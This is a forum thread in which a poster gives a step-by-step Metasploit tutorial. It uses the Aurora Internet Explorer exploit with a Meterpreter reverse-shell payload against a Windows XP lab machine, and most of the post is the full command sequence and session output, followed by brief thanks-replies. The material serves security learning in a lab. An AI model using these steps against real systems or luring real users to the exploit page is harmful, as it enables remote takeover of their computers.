1. We have moved from vBulletin to XenForo and you are viewing the site in the middle of the move. Though the functional aspect of everything is working fine, we are still working on other changes including the new design on Xenforo.
    Dismiss Notice

Client Side Exploitation Using Metasploit

Discussion in 'Ethical hacking Tips' started by lionaneesh, Aug 2, 2011.

  1. lionaneesh

    lionaneesh New Member

    In this tutorial we’ll be learning how to perform a basic client side exploitation using Metasploit. Note this tutorial is made for educational purposes only to help you understand how the exploit's can be exploited.

    Client Side Attacks



    Client side attacks are special types of attacks that mainly target Client Side Applications, eg : Web Browser , Download Client etc. These are Different from Server Side Applications as instead of targeting vulnerabilities in Server Side applications like : Web Server etc. It actually targets the client side application.

    For demonstrating this attack we’ll be using the Metasploit Framework and Using one of its basic Client Side Exploit.

    Lab Setup



    The Lab Consists of a Victim and an Attacker Machine.

    Code:
    +++++++++++++++++++                   +++++++++++++++++++++
    + Attacker        +  ================ + Victim Machine    +
    +                 +    Behind NAT     +                   +
    +++++++++++++++++++                   +++++++++++++++++++++
      
    Victim

    The Victim Machine is running an Unlatched Windows XP SP1 machine; With Internet Explorer 6 Which is vulnerable to a Client Side Vulnerability.

    Attacker

    The Attacker’s Machine is running Backtrack 5 with Metasploit Installed.

    I am using Virtual Machines to Setup my Lab, and the Network Type is set to NAT.

    Now that we have setup our lab let the hacking begin.

    Exploitation



    First lets open up Metasploit Console , using ‘msfconsole’ :-

    Code:
      root@bt:~# msfconsole
       
                      __.                       .__.        .__. __.
        _____   _____/  |______    ____________ |  |   ____ |__|/  |_
       /     \_/ __ \   __\__  \  /  ___/\____ \|  |  /  _ \|  \   __\
      |  Y Y  \  ___/|  |  / __ \_\___ \ |  |_> >  |_(  <_> )  ||  |
      |__|_|  /\___  >__| (____  /____  >|   __/|____/\____/|__||__|
            \/     \/          \/     \/ |__|
       
       
             =[ metasploit v3.8.0-dev [core:3.8 api:1.0]
      + -- --=[ 688 exploits - 357 auxiliary - 39 post
      + -- --=[ 217 payloads - 27 encoders - 8 nops
      msf >
      
    Though Metasploit provides hundreds of exploits to exploit Internet Explorer 6, for this tutorial we’ll be using the Internet Explorer Aurora Exploit.

    To use this exploit in Metasploit simple use the ‘use’ command:-

    Code:
      msf > use exploit/windows/browser/ms10_002_aurora
       
      msf exploit(ms10_002_aurora) >
      
    Now let’s have a look at the options:-
    Code:
      msf exploit(ms10_002_aurora) > show options
       
      Module options (exploit/windows/browser/ms10_002_aurora):
       
         Name        Current Setting  Required  Description
         ----        ---------------  --------  -----------
         SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
         SRVPORT     8080             yes       The local port to listen on.
         SSL         false            no        Negotiate SSL for incoming connections
         SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
         URIPATH                      no        The URI to use for this exploit (default is random)
       
       
      Exploit target:
       
         Id  Name
         --  ----
         0   Automatic
       
      
    Now let’s set them!
    Code:
      msf exploit(ms10_002_aurora) > set SRVHOST 127.0.0.1
      SRVHOST => 127.0.0.1
      msf exploit(ms10_002_aurora) > set SRVPORT 80
      SRVPORT => 80
      msf exploit(ms10_002_aurora) > set URIPATH /
      URIPATH => /
      msf exploit(ms10_002_aurora) >
      
    Above we set the Server to localhost i.e 127.0.0.1 , Server port to 80 and the URI path to ‘/’ (ROOT).

    Now let’s Set some Payload Options:-
    Code:
      msf exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
      PAYLOAD => windows/meterpreter/reverse_tcp
      msf exploit(ms10_002_aurora) > show options
       
      Module options (exploit/windows/browser/ms10_002_aurora):
       
         Name        Current Setting  Required  Description
         ----        ---------------  --------  -----------
         SRVHOST     127.0.0.1        yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
         SRVPORT     80               yes       The local port to listen on.
         SSL         false            no        Negotiate SSL for incoming connections
         SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
         URIPATH     /                no        The URI to use for this exploit (default is random)
       
       
      Payload options (windows/meterpreter/reverse_tcp):
       
         Name      Current Setting  Required  Description
         ----      ---------------  --------  -----------
         EXITFUNC  process          yes       Exit technique: seh, thread, process, none
         LHOST                      yes       The listen address
         LPORT     4444             yes       The listen port
       
       
      Exploit target:
       
         Id  Name
         --  ----
         0   Automatic
       
       
      msf exploit(ms10_002_aurora) > set LHOST 120.0.0.1
      LHOST => 120.0.0.1
      msf exploit(ms10_002_aurora) > set LPORT 31337
      LPORT => 31337
      msf exploit(ms10_002_aurora) >
       
    Above we set the Payload to reverse_tcp , the listening server to localhost and the listening Port to 31337.

    Now that all is setup, let’s launch the exploit:-
    Code:
       
      msf exploit(ms10_002_aurora) > exploit
      
    Exploit running as background job.
    Started reverse handler on 127.0.0.1:31337 
    Using URL: http://127.0.0.1:80/
    Server started.
      
    The malicious web page is sitting on our server (URL: http://127.0.0.1:80/) , Now all you have to do is direct victim to this webpage and if they are running an exploitable version on Windows XP they’ll get owned!

    In this case I’ll use vulnerable IE browser on the Victim Machine to view this site , Now see what happens:-

    Code:
    Sending stage (723456 bytes)
    
    Meterpreter session 1 opened (192.168.0.1:31337 -> 192.168.0.2:1514)
    
    msf exploit(ie_aurora) > [B]sessions -i 1[/B]
    
    Starting interaction with 1...
    
    meterpreter > [B]getuid[/B]
    Server username: WINXP\VICTIM
     
    We got a meterpreter session. Now you can use this to execute any command on the system. Thus the victim machine got owned.

    That’s all for this tutorial stay tuned for more.
     
  2. anilkamble

    anilkamble New Member

    Thanks for sharing this nice info with us .
    hoping more from u.
     
  3. lionaneesh

    lionaneesh New Member

    My Pleasure! :D
     
  4. ManzZup

    ManzZup New Member

    really nice one
    thankx for the share :D
     
  5. lionaneesh

    lionaneesh New Member

    My Pleasure!
     

Share This Page